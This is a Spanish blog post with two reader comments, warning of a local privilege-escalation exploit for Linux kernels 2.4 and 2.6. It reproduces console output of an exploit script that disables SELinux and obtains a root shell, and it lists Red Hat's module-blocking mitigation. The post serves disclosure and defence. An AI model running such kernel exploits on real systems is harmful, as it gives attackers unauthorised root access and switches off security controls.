•
Exploit local para los kernels Linux 2.4 y 2.6
Recientemente ha encontrado un bug explotable para tanto los kernels 2.4 y 2.6.
Este mediante los múltiples exploits disponibles podemos escalar privilegios desde cualquier usuario a root:
$ ./wunderbar_emporium.sh [+] MAPPED ZERO PAGE! [+] Resolved security_ops to 0xc07bb160 [+] Resolved sel_read_enforce to 0xc04c765b [+] got ring0! [+] detected 2.6 style 4k stacks sh: mplayer: command not found [+] Disabled security of : SELinux [+] Got root! sh-3.2#
El principal peligro es que afecta tanto si tenemos SELinux como si no:
$ ./wunderbar_emporium.sh [+] MAPPED ZERO PAGE! [+] Resolved security_ops to 0xffffffff80496be0 [+] Resolved sel_read_enforce to 0xffffffff8012957b [+] got ring0! [+] detected 2.6 style 4k stacks sh: mplayer: command not found [+] Disabled security of : nothing, what an insecure machine! [+] Got root! sh-3.2#
Para proteger una CentOS o una RHEL tenemos los siguientes pasos para mitigar el problema. La recomendación de RedHat es la siguiente:
install pppox /bin/true install bluetooth /bin/true install sctp /bin/true
Para el caso del modulo sctp, si ya esta cargado, deberemos reiniciar el sistema. Con esto simplemente evitamos que el sistema sea explotable.
Relacionados
Imprimir
•
2 comments to “Exploit local para los kernels Linux 2.4 y 2.6”
•
18. August 2009 at 9:01 am :
Idea mira o esto ya se soluciono en Debian?
http://www.debian.org/security/2009/dsa-1864
Hoy cuando actualice el sistema en Fedora 11, me actualizo el kernel a la version kernel-2.6.29.6-217.2.8.fc11.i586
Tabien estara solucionado en Fedora?
18. August 2009 at 9:11 am :
Efectivamente, tanto en Debian como en Ubuntu como con los parches de grSecuity esta solucionado. En CentOS con el último disponible no he visto que este solucionado aún: